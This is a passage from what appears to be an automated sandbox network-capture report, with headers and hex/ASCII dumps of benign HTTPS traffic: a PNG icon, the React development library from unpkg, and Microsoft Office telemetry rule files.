                                                                                                                                                                                                            last-modified: Tue, 11 Jun 2024 06:29:43 GMT
                                                                                                                                                                                                            etag: "0x8DC89DFE156C48F"
                                                                                                                                                                                                            content-disposition: attachment; filename="find-expert.png"; filename*=UTF-8''find-expert.png
                                                                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                                                                            Cache-Control: public, max-age=86400, immutable
                                                                                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                                                                                            x-content-type-options: nosniff
                                                                                                                                                                                                            x-vhost: publish
                                                                                                                                                                                                            strict-transport-security: max-age=31557600
                                                                                                                                                                                                            x-served-by: cache-pao-kpao1770025-PAO
                                                                                                                                                                                                            x-cache: MISS
                                                                                                                                                                                                            x-timer: S1718122491.698631,VS0,VS0,VE1131
                                                                                                                                                                                                            CF-Cache-Status: REVALIDATED
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8de2b027f90ee7df-DFW
                                                                                                                                                                                                            2024-11-06 05:29:51 UTC555INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 16 00 00 00 16 08 06 00 00 00 c4 b4 6c 3b 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 01 c0 49 44 41 54 78 01 ed 54 31 56 c2 40 10 9d 59 f2 b4 d3 d8 59 88 2f 3e b0 15 72 02 f5 06 7a 03 3c 81 7a 02 f5 06 7a 02 f0 04 7a 03 f0 04 f8 c0 12 9e fb 84 c2 ce 60 a5 90 dd 71 16 04 36 04 48 2c e8 fc d5 66 e7 ef 9f 99 9d bf 41 48 81 e6 4e fe 48 0b 38 82 94 d0 fd b0 e2 a4 21 92 a0 32 02 7a 90 12 62 cd 01 01 2b c2 bf f0 ea 85 53 b9 22 06 82 1a 20 ca 45 61 b6 e6 e3 9f 85 09 e0 a6 d0 69 5d 27 f1 22 c2 f5 6d cf 63 0f 96 86 59 d9 e4 fe bb 94 56 38 50 1a 4e fd 6e ab 36 de 68 64 73 27 84 58 44 22 a9 06 aa 66
                                                                                                                                                                                                            Data Ascii: PNGIHDRl;pHYssRGBgAMAaIDATxT1V@YY/>rz<zzz`q6H,fAHNH8!2zb+S" Eai]'"mcYV8PNn6hds'XD"f


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            91192.168.2.457764104.17.245.2034432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:50 UTC370OUTGET /react@18.3.1/umd/react.development.js HTTP/1.1
                                                                                                                                                                                                            Host: unpkg.com
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            2024-11-06 05:29:50 UTC577INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:50 GMT
                                                                                                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                                                                            cache-control: public, max-age=31536000
                                                                                                                                                                                                            last-modified: Sat, 26 Oct 1985 08:15:00 GMT
                                                                                                                                                                                                            etag: W/"1ad6b-kNV4OIuev8g4lblTOp0VuOU34Qg"
                                                                                                                                                                                                            via: 1.1 fly.io
                                                                                                                                                                                                            fly-request-id: 01JB1FAX2F93CYQ7KRKFYC268G-dfw
                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                            Age: 1023270
                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8de2b02a2f456b3b-DFW
                                                                                                                                                                                                            2024-11-06 05:29:50 UTC792INData Raw: 37 64 36 30 0d 0a 2f 2a 2a 0a 20 2a 20 40 6c 69 63 65 6e 73 65 20 52 65 61 63 74 0a 20 2a 20 72 65 61 63 74 2e 64 65 76 65 6c 6f 70 6d 65 6e 74 2e 6a 73 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 46 61 63 65 62 6f 6f 6b 2c 20 49 6e 63 2e 20 61 6e 64 20 69 74 73 20 61 66 66 69 6c 69 61 74 65 73 2e 0a 20 2a 0a 20 2a 20 54 68 69 73 20 73 6f 75 72 63 65 20 63 6f 64 65 20 69 73 20 6c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 20 66 6f 75 6e 64 20 69 6e 20 74 68 65 0a 20 2a 20 4c 49 43 45 4e 53 45 20 66 69 6c 65 20 69 6e 20 74 68 65 20 72 6f 6f 74 20 64 69 72 65 63 74 6f 72 79 20 6f 66 20 74 68 69 73 20 73 6f 75 72 63 65 20 74 72 65 65 2e 0a 20 2a 2f 0a 28 66 75 6e 63 74 69 6f 6e 20 28 67 6c 6f 62
                                                                                                                                                                                                            Data Ascii: 7d60/** * @license React * react.development.js * * Copyright (c) Facebook, Inc. and its affiliates. * * This source code is licensed under the MIT license found in the * LICENSE file in the root directory of this source tree. */(function (glob
                                                                                                                                                                                                            2024-11-06 05:29:50 UTC1369INData Raw: 20 53 79 6d 62 6f 6c 2e 66 6f 72 28 27 72 65 61 63 74 2e 65 6c 65 6d 65 6e 74 27 29 3b 0a 20 20 76 61 72 20 52 45 41 43 54 5f 50 4f 52 54 41 4c 5f 54 59 50 45 20 3d 20 53 79 6d 62 6f 6c 2e 66 6f 72 28 27 72 65 61 63 74 2e 70 6f 72 74 61 6c 27 29 3b 0a 20 20 76 61 72 20 52 45 41 43 54 5f 46 52 41 47 4d 45 4e 54 5f 54 59 50 45 20 3d 20 53 79 6d 62 6f 6c 2e 66 6f 72 28 27 72 65 61 63 74 2e 66 72 61 67 6d 65 6e 74 27 29 3b 0a 20 20 76 61 72 20 52 45 41 43 54 5f 53 54 52 49 43 54 5f 4d 4f 44 45 5f 54 59 50 45 20 3d 20 53 79 6d 62 6f 6c 2e 66 6f 72 28 27 72 65 61 63 74 2e 73 74 72 69 63 74 5f 6d 6f 64 65 27 29 3b 0a 20 20 76 61 72 20 52 45 41 43 54 5f 50 52 4f 46 49 4c 45 52 5f 54 59 50 45 20 3d 20 53 79 6d 62 6f 6c 2e 66 6f 72 28 27 72 65 61 63 74 2e 70 72 6f
                                                                                                                                                                                                            Data Ascii: Symbol.for('react.element'); var REACT_PORTAL_TYPE = Symbol.for('react.portal'); var REACT_FRAGMENT_TYPE = Symbol.for('react.fragment'); var REACT_STRICT_MODE_TYPE = Symbol.for('react.strict_mode'); var REACT_PROFILER_TYPE = Symbol.for('react.pro
                                                                                                                                                                                                            2024-11-06 05:29:50 UTC1369INData Raw: 0a 20 20 20 2a 20 4b 65 65 70 73 20 74 72 61 63 6b 20 6f 66 20 74 68 65 20 63 75 72 72 65 6e 74 20 62 61 74 63 68 27 73 20 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 73 75 63 68 20 61 73 20 68 6f 77 20 6c 6f 6e 67 20 61 6e 20 75 70 64 61 74 65 0a 20 20 20 2a 20 73 68 6f 75 6c 64 20 73 75 73 70 65 6e 64 20 66 6f 72 20 69 66 20 69 74 20 6e 65 65 64 73 20 74 6f 2e 0a 20 20 20 2a 2f 0a 20 20 76 61 72 20 52 65 61 63 74 43 75 72 72 65 6e 74 42 61 74 63 68 43 6f 6e 66 69 67 20 3d 20 7b 0a 20 20 20 20 74 72 61 6e 73 69 74 69 6f 6e 3a 20 6e 75 6c 6c 0a 20 20 7d 3b 0a 0a 20 20 76 61 72 20 52 65 61 63 74 43 75 72 72 65 6e 74 41 63 74 51 75 65 75 65 20 3d 20 7b 0a 20 20 20 20 63 75 72 72 65 6e 74 3a 20 6e 75 6c 6c 2c 0a 20 20 20 20 2f 2f 20 55 73 65 64 20 74 6f 20 72
                                                                                                                                                                                                            Data Ascii: * Keeps track of the current batch's configuration such as how long an update * should suspend for if it needs to. */ var ReactCurrentBatchConfig = { transition: null }; var ReactCurrentActQueue = { current: null, // Used to r
                                                                                                                                                                                                            2024-11-06 05:29:50 UTC1369INData Raw: 20 20 20 20 20 76 61 72 20 69 6d 70 6c 20 3d 20 52 65 61 63 74 44 65 62 75 67 43 75 72 72 65 6e 74 46 72 61 6d 65 2e 67 65 74 43 75 72 72 65 6e 74 53 74 61 63 6b 3b 0a 0a 20 20 20 20 20 20 69 66 20 28 69 6d 70 6c 29 20 7b 0a 20 20 20 20 20 20 20 20 73 74 61 63 6b 20 2b 3d 20 69 6d 70 6c 28 29 20 7c 7c 20 27 27 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 72 65 74 75 72 6e 20 73 74 61 63 6b 3b 0a 20 20 20 20 7d 3b 0a 20 20 7d 0a 0a 20 20 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 0a 20 20 76 61 72 20 65 6e 61 62 6c 65 53 63 6f 70 65 41 50 49 20 3d 20 66
                                                                                                                                                                                                            Data Ascii: var impl = ReactDebugCurrentFrame.getCurrentStack; if (impl) { stack += impl() || ''; } return stack; }; } // ----------------------------------------------------------------------------- var enableScopeAPI = f
                                                                                                                                                                                                            2024-11-06 05:29:50 UTC1369INData Raw: 20 61 72 67 73 5b 5f 6b 65 79 20 2d 20 31 5d 20 3d 20 61 72 67 75 6d 65 6e 74 73 5b 5f 6b 65 79 5d 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 70 72 69 6e 74 57 61 72 6e 69 6e 67 28 27 77 61 72 6e 27 2c 20 66 6f 72 6d 61 74 2c 20 61 72 67 73 29 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 0a 20 20 7d 0a 20 20 66 75 6e 63 74 69 6f 6e 20 65 72 72 6f 72 28 66 6f 72 6d 61 74 29 20 7b 0a 20 20 20 20 7b 0a 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 66 6f 72 20 28 76 61 72 20 5f 6c 65 6e 32 20 3d 20 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 2c 20 61 72 67 73 20 3d 20 6e 65 77 20 41 72 72 61 79 28 5f 6c 65 6e 32 20 3e 20 31 20 3f 20 5f 6c 65 6e 32 20 2d 20 31 20 3a 20 30 29 2c 20 5f 6b 65 79 32 20 3d 20 31 3b 20 5f 6b 65 79 32 20 3c
                                                                                                                                                                                                            Data Ascii: args[_key - 1] = arguments[_key]; } printWarning('warn', format, args); } } } function error(format) { { { for (var _len2 = arguments.length, args = new Array(_len2 > 1 ? _len2 - 1 : 0), _key2 = 1; _key2 <
                                                                                                                                                                                                            2024-11-06 05:29:50 UTC1369INData Raw: 64 61 74 65 46 6f 72 55 6e 6d 6f 75 6e 74 65 64 43 6f 6d 70 6f 6e 65 6e 74 20 3d 20 7b 7d 3b 0a 0a 20 20 66 75 6e 63 74 69 6f 6e 20 77 61 72 6e 4e 6f 6f 70 28 70 75 62 6c 69 63 49 6e 73 74 61 6e 63 65 2c 20 63 61 6c 6c 65 72 4e 61 6d 65 29 20 7b 0a 20 20 20 20 7b 0a 20 20 20 20 20 20 76 61 72 20 5f 63 6f 6e 73 74 72 75 63 74 6f 72 20 3d 20 70 75 62 6c 69 63 49 6e 73 74 61 6e 63 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6d 70 6f 6e 65 6e 74 4e 61 6d 65 20 3d 20 5f 63 6f 6e 73 74 72 75 63 74 6f 72 20 26 26 20 28 5f 63 6f 6e 73 74 72 75 63 74 6f 72 2e 64 69 73 70 6c 61 79 4e 61 6d 65 20 7c 7c 20 5f 63 6f 6e 73 74 72 75 63 74 6f 72 2e 6e 61 6d 65 29 20 7c 7c 20 27 52 65 61 63 74 43 6c 61 73 73 27 3b 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: dateForUnmountedComponent = {}; function warnNoop(publicInstance, callerName) { { var _constructor = publicInstance.constructor; var componentName = _constructor && (_constructor.displayName || _constructor.name) || 'ReactClass';
                                                                                                                                                                                                            2024-11-06 05:29:50 UTC1369INData Raw: 69 73 20 77 68 65 6e 20 79 6f 75 20 6b 6e 6f 77 20 74 68 61 74 20 73 6f 6d 65 20 64 65 65 70 65 72 20 61 73 70 65 63 74 20 6f 66 20 74 68 65 0a 20 20 20 20 20 2a 20 63 6f 6d 70 6f 6e 65 6e 74 27 73 20 73 74 61 74 65 20 68 61 73 20 63 68 61 6e 67 65 64 20 62 75 74 20 60 73 65 74 53 74 61 74 65 60 20 77 61 73 20 6e 6f 74 20 63 61 6c 6c 65 64 2e 0a 20 20 20 20 20 2a 0a 20 20 20 20 20 2a 20 54 68 69 73 20 77 69 6c 6c 20 6e 6f 74 20 69 6e 76 6f 6b 65 20 60 73 68 6f 75 6c 64 43 6f 6d 70 6f 6e 65 6e 74 55 70 64 61 74 65 60 2c 20 62 75 74 20 69 74 20 77 69 6c 6c 20 69 6e 76 6f 6b 65 0a 20 20 20 20 20 2a 20 60 63 6f 6d 70 6f 6e 65 6e 74 57 69 6c 6c 55 70 64 61 74 65 60 20 61 6e 64 20 60 63 6f 6d 70 6f 6e 65 6e 74 44 69 64 55 70 64 61 74 65 60 2e 0a 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: is when you know that some deeper aspect of the * component's state has changed but `setState` was not called. * * This will not invoke `shouldComponentUpdate`, but it will invoke * `componentWillUpdate` and `componentDidUpdate`.
                                                                                                                                                                                                            2024-11-06 05:29:50 UTC1369INData Raw: 69 63 49 6e 73 74 61 6e 63 65 2c 20 27 72 65 70 6c 61 63 65 53 74 61 74 65 27 29 3b 0a 20 20 20 20 7d 2c 0a 0a 20 20 20 20 2f 2a 2a 0a 20 20 20 20 20 2a 20 53 65 74 73 20 61 20 73 75 62 73 65 74 20 6f 66 20 74 68 65 20 73 74 61 74 65 2e 20 54 68 69 73 20 6f 6e 6c 79 20 65 78 69 73 74 73 20 62 65 63 61 75 73 65 20 5f 70 65 6e 64 69 6e 67 53 74 61 74 65 20 69 73 0a 20 20 20 20 20 2a 20 69 6e 74 65 72 6e 61 6c 2e 20 54 68 69 73 20 70 72 6f 76 69 64 65 73 20 61 20 6d 65 72 67 69 6e 67 20 73 74 72 61 74 65 67 79 20 74 68 61 74 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 64 65 65 70 0a 20 20 20 20 20 2a 20 70 72 6f 70 65 72 74 69 65 73 20 77 68 69 63 68 20 69 73 20 63 6f 6e 66 75 73 69 6e 67 2e 20 54 4f 44 4f 3a 20 45 78 70 6f 73 65 20 70 65
                                                                                                                                                                                                            Data Ascii: icInstance, 'replaceState'); }, /** * Sets a subset of the state. This only exists because _pendingState is * internal. This provides a merging strategy that is not available to deep * properties which is confusing. TODO: Expose pe
                                                                                                                                                                                                            2024-11-06 05:29:50 UTC1369INData Raw: 61 20 73 75 62 73 65 74 20 6f 66 20 74 68 65 20 73 74 61 74 65 2e 20 41 6c 77 61 79 73 20 75 73 65 20 74 68 69 73 20 74 6f 20 6d 75 74 61 74 65 0a 20 20 20 2a 20 73 74 61 74 65 2e 20 59 6f 75 20 73 68 6f 75 6c 64 20 74 72 65 61 74 20 60 74 68 69 73 2e 73 74 61 74 65 60 20 61 73 20 69 6d 6d 75 74 61 62 6c 65 2e 0a 20 20 20 2a 0a 20 20 20 2a 20 54 68 65 72 65 20 69 73 20 6e 6f 20 67 75 61 72 61 6e 74 65 65 20 74 68 61 74 20 60 74 68 69 73 2e 73 74 61 74 65 60 20 77 69 6c 6c 20 62 65 20 69 6d 6d 65 64 69 61 74 65 6c 79 20 75 70 64 61 74 65 64 2c 20 73 6f 0a 20 20 20 2a 20 61 63 63 65 73 73 69 6e 67 20 60 74 68 69 73 2e 73 74 61 74 65 60 20 61 66 74 65 72 20 63 61 6c 6c 69 6e 67 20 74 68 69 73 20 6d 65 74 68 6f 64 20 6d 61 79 20 72 65 74 75 72 6e 20 74 68 65
                                                                                                                                                                                                            Data Ascii: a subset of the state. Always use this to mutate * state. You should treat `this.state` as immutable. * * There is no guarantee that `this.state` will be immediately updated, so * accessing `this.state` after calling this method may return the
                                                                                                                                                                                                            2024-11-06 05:29:50 UTC1369INData Raw: 6c 29 20 7b 0a 20 20 20 20 20 20 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 27 73 65 74 53 74 61 74 65 28 2e 2e 2e 29 3a 20 74 61 6b 65 73 20 61 6e 20 6f 62 6a 65 63 74 20 6f 66 20 73 74 61 74 65 20 76 61 72 69 61 62 6c 65 73 20 74 6f 20 75 70 64 61 74 65 20 6f 72 20 61 20 27 20 2b 20 27 66 75 6e 63 74 69 6f 6e 20 77 68 69 63 68 20 72 65 74 75 72 6e 73 20 61 6e 20 6f 62 6a 65 63 74 20 6f 66 20 73 74 61 74 65 20 76 61 72 69 61 62 6c 65 73 2e 27 29 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 74 68 69 73 2e 75 70 64 61 74 65 72 2e 65 6e 71 75 65 75 65 53 65 74 53 74 61 74 65 28 74 68 69 73 2c 20 70 61 72 74 69 61 6c 53 74 61 74 65 2c 20 63 61 6c 6c 62 61 63 6b 2c 20 27 73 65 74 53 74 61 74 65 27 29 3b 0a 20 20 7d 3b 0a 20 20 2f 2a 2a 0a 20 20 20 2a 20 46 6f
                                                                                                                                                                                                            Data Ascii: l) { throw new Error('setState(...): takes an object of state variables to update or a ' + 'function which returns an object of state variables.'); } this.updater.enqueueSetState(this, partialState, callback, 'setState'); }; /** * Fo


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            92192.168.2.45776813.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:50 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-06 05:29:50 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:50 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 419
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                                                            ETag: "0x8DC582B9C710B28"
                                                                                                                                                                                                            x-ms-request-id: d07841a0-401e-0064-490f-2d54af000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241106T052950Z-16547b76f7f7lhvnhC1DFWa2k0000000063000000000a5dx
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-06 05:29:50 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            93192.168.2.45776713.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:50 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-06 05:29:50 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:50 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 471
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                                                            ETag: "0x8DC582B97E6FCDD"
                                                                                                                                                                                                            x-ms-request-id: a4ba0423-501e-0029-6446-2cd0b8000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241106T052950Z-16547b76f7fxdzxghC1DFWmf7n000000069000000000buq8
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-06 05:29:50 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            94192.168.2.45776613.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:50 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-06 05:29:50 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:50 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 415
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                                                            x-ms-request-id: 9919728d-d01e-002b-4b0b-2d25fb000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241106T052950Z-16547b76f7fdf69shC1DFWcpd000000005zg00000000rsme
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-06 05:29:50 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            95192.168.2.45776513.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:50 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-06 05:29:50 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:50 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 479
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                            ETag: "0x8DC582B989EE75B"
                                                                                                                                                                                                            x-ms-request-id: 100aec20-201e-006e-1215-2dbbe3000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241106T052950Z-16547b76f7f9bs6dhC1DFWt3rg0000000670000000005nth
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
